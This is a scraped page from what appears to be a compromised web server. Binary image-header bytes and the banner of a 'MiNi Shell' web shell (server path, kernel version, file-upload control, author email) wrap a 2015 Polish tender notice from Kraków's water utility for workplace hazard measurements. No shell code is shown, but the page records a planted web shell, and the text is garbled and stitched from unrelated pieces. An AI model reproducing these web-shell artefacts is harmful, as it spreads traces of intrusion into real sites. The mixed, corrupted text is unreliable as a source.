JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150429/98684-N-2015.html

<p class="kh_header"><b>Kraków: Badania czynników szkodliwych środowiska pracy oraz pomiary wydatku energetycznego na stanowiskach pracy</b><br>
<b>Numer ogłoszenia: 98684 - 2015; data zamieszczenia: 29.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Wodociągów i Kanalizacji S.A. w Krakowie , ul. Senatorska 1, 30-106 Kraków, woj. małopolskie, tel. (012) 4212011 wew. 391, faks (012) 4242397, 4242391.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpwik.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: sektor wodny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Badania czynników szkodliwych środowiska pracy oraz pomiary wydatku energetycznego na stanowiskach pracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> badanie czynników szkodliwych środowiska pracy oraz pomiary wydatku energetycznego na stanowiskach pracy.

Rodzaj czynników objętych badaniem:
Czynniki fizyczne:

1.hałas - 84 stanowiska pracy, w tym 63 stanowiska pracy - pomiar z podziałem  na czynności, 21 stanowisk pracy pomiary całodzienne
Opracowanie dokumentacji 
Dobór środków ochrony indywidulnej
Prowadzenie rejestru czynników szkodliwych   
Oceny ryzyka zawodowego  dla mierzalnych czynników środowiska pracy wg 
Polskiej Normy PN-N-18002 dla wszystkich stanowisk pracy na których zmierzono hałas. 
2.drgania mechaniczne - 37 stanowisk pracy 
Opracowanie dokumentacji
Prowadzenie rejestru czynników szkodliwych    
Oceny ryzyka zawodowego dla mierzalnych czynników środowiska pracy wg 
Polskiej Normy PN-N-18002 dla wszystkich stanowisk pracy na których zmierzono drgania mechaniczne.  

3.pył całkowity , pył respirabilny , oznaczenie stężenia wolnej krystalicznej krzemionki  
- 22 stanowiska  pracy 
Opracowanie dokumentacji
Prowadzenie rejestru czynników szkodliwych
Oceny ryzyka zawodowego dla mierzalnych czynników środowiska pracy wg 
Polskiej Normy PN-N-18002 dla wszystkich stanowisk pracy na których zmierzono pyły.
4. pomiar pola elektromagnetycznego w zakresie częstotliwości wg PN-T-06580-1:2002 i 
PN-T-06580-3:2002 - 17 stanowisk pracy.

Czynniki chemiczne:

1. tlenek węgla - 3 stanowiska pracy 
2. tlenek azotu - 3 stanowiska pracy 
3. ditlenek azotu - 2 stanowiska pracy 
4. tlenki żelaza- 2 stanowiska pracy 
5. mangan i jego związki - 2 stanowiska pracy 
6. amoniak - 2 stanowiska pracy 
7. kwas siarkowy - 5 stanowisk pracy 
8. chlor - 1 stanowisko pracy
9. benzen - 4 stanowiska pracy 
10. chloroform - 5 stanowisk pracy
11. aceton - 3 stanowiska pracy 
12. rtęć- 5 stanowisk pracy 
13. etanol - 1 stanowisko pracy
14. benzyna ekstrakcyjna - 1 stanowisko pracy
15. azydek sodu - 1 stanowisko pracy 
16. kwas azotowy - 1 stanowisko pracy 
17. butan - 1 stanowisko pracy 
18. fenol - 1 stanowisko pracy
19. metanol - 1 stanowisko pracy 
20. heksan - 1 stanowisko pracy 
21. acetonitryl - 1 stanowisko pracy
Opracowanie dokumentacji
Prowadzenie rejestru czynników szkodliwych    
Oceny ryzyka zawodowego dla mierzalnych czynników środowiska pracy wg 
Polskiej Normy PN-N-18002 dla wszystkich stanowisk pracy na których zmierzono dany czynnik chemiczny 

Czynniki biologiczne analiza jakościowo ilościowa - 
 4 stanowiska pracy - 13 punktów pomiarowych
Na podstawie Polskich Norm :
 - PN-Z-04008-7 (2002) - Ochrona czystości powietrza. Pobieranie próbek, zasady pobierania próbek powietrza w środowisku pracy i interpretacji wyników.
- PN-80-Z-08052 - Niebezpieczne i szkodliwe czynniki występujące w procesie pracy. Klasyfikacja.
- PN-EN 13098 (2002) Powietrze na stanowiskach pracy - Wytyczne dotyczące pomiaru zawieszonych w powietrzu mikroorganizmów i endotoksyn. 
- PN-89/Z-04111/02 Ochrona czystości powietrza. Badania mikrobiologiczne. Oznaczenie liczby bakterii w powietrzu atmosferycznym (imisja) przy pobieraniu próbek metodą aspiracyjną i sedymentacyjną.
- PN-89/Z-04111/03 Ochrona czystości powietrza. Badania mikrobiologiczne. Oznaczenie liczby grzybów mikroskopowych w powietrzu atmosferycznym (imisja) przy pobieraniu próbek metodą aspiracyjną i sedymentacyjną. 
-  PN-89/Z-04008/08 Ochrona czystości powietrza. Pobieranie próbek. Pobieranie próbek powietrza atmosferycznego (imisja) do badań mikrobiologicznych metodą aspiracyjną i sedymentacyjną.
Opracowanie  dokumentacji wraz z oceną ryzyka zawodowego dotyczącego narażenia na czynnik biologiczny w oparciu o normę  PN-N-18002 Systemy zarządzania bezpieczeństwem i higieną pracy. Ogólne wytyczne do oceny ryzyka zawodowego.

Badanie wydatku energetycznego
11 stanowisk pracy 
Na podstawie Polskich Norm:
PN-EN ISO 28996:1999 - Ergonomia. Oznaczenie metabolicznej produkcji ciepła
PN-EN ISO 8996:2005 - Ergonomia środowiska termicznego. Określenie tempa metabolizmu
Metodyka badań :
a) Ocena wydatku energetycznego metodą chronometrażowo-tabelaryczną z fotografią dnia roboczego
b) Ocena wydatku energetycznego metodą opartą na pomiarze wentylacji płuc - pomiar przy użyciu miernika.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.	Zamawiający przewiduje, że w okresie 3 lat od zawarcia umowy na wykonanie niniejszego zamówienia  wybranemu wykonawcy mogą zostać udzielone zamówienia uzupełniające dotyczące przedmiotu zamówienia podstawowego, stanowiące nie więcej niż 50 % wartości niniejszego zamówienia.
2.	Zamówienia uzupełniające mogą polegać na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.11.10.00-1, 73.11.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia do oferty należy załączyć:
1)	Formularz nr 2 - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych nadal, głównych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert (to jest zakończonych nie wcześniej niż w 2012 r.), a jeżeli okres prowadzenia działalności jest krótszy - wykonanych (wykonywanych) w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których je wykonano; dla celów niniejszego zamówienia głównymi usługami, które musi obejmować ww. wykaz, są co najmniej dwa zlecenia o charakterze kompleksowym obejmujące pomiary hałasu, drgań mechanicznych,  pyłów, czynników chemicznych,  czynników biologicznych analiza ilościowo jakościowa , pola elektromagnetycznego oraz wydatku energetycznego, których koszt wykonania wynosił nie mniej niż 30.000,00 zł łącznie, przy czym brak w Formularzu nr 2 wykonanych usług o powyższych cechach będzie równoznaczny z brakiem wymaganego doświadczenia;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.W celu spełnienia pozostałych wymagań zamawiającego do oferty należy załączyć także:
1)	Formularz nr 1 - Podstawowe dane wykonawcy - według wzoru załączonego do specyfikacji;
2)	Szczegółowa wycena oferowanych usług;
3)	Upoważnienie (pełnomocnictwo) do podpisania oferty lub/i załączników do niej, o którym mowa w pkt XIV.5.3) SIWZ (jeżeli wszystkie te dokumenty podpisują w odpowiedniej liczbie osoby upoważnione do reprezentowania wykonawcy, załącznik ten nie jest konieczny);
4)	Pełnomocnictwo do reprezentowania podmiotów występujących wspólnie, o którym mowa w pkt XV.4 SIWZ p.t.: Wykonawcy występujący wspólnie (brak załącznika oznacza, że nie dotyczy on składającego ofertę).
2. W celu potwierdzenia spełniania przez oferowane usługi wymagań określonych przez zamawiającego do oferty należy załączyć: 
1)	dokument potwierdzający, że wykonawca posiada akredytację na podstawie przepisów ustawy z dnia 30 sierpnia 2002 r. o systemie oceny zgodności (Dz. U. z 2004 r. Nr 204 poz.2087 z późniejszymi zmianami) w zakresie oferowanych badań i pomiarów czynników szkodliwych dla zdrowia w środowisku pracy;
2)	oświadczenie, że wykonawca posiada akredytację systemu zarządzania zgodnie z Normą PN-ISO 17025:2005 Ogólne wymagania dotyczące kompetencji laboratoriów badawczych i wzorcujących;
3)	oświadczenie potwierdzające, że Wykonawca dysponuje przyrządami pomiarowymi umożliwiającymi wykonanie zamówienia;
4)	oświadczenie , że wykonawca  posiada akredytację na 3 strategie pomiarowe według normy PN-ISO 9612:2011 w przypadku pomiarów poziomu dźwięku.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpwik.krakow.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.mpwik.krakow.pl/przetargi.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2015 godzina 09:15, miejsce: w siedzibie Miejskiego Przedsiębiorstwa Wodociągów i Kanalizacji SA, 30-106 Kraków, ul. Senatorska 1, pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com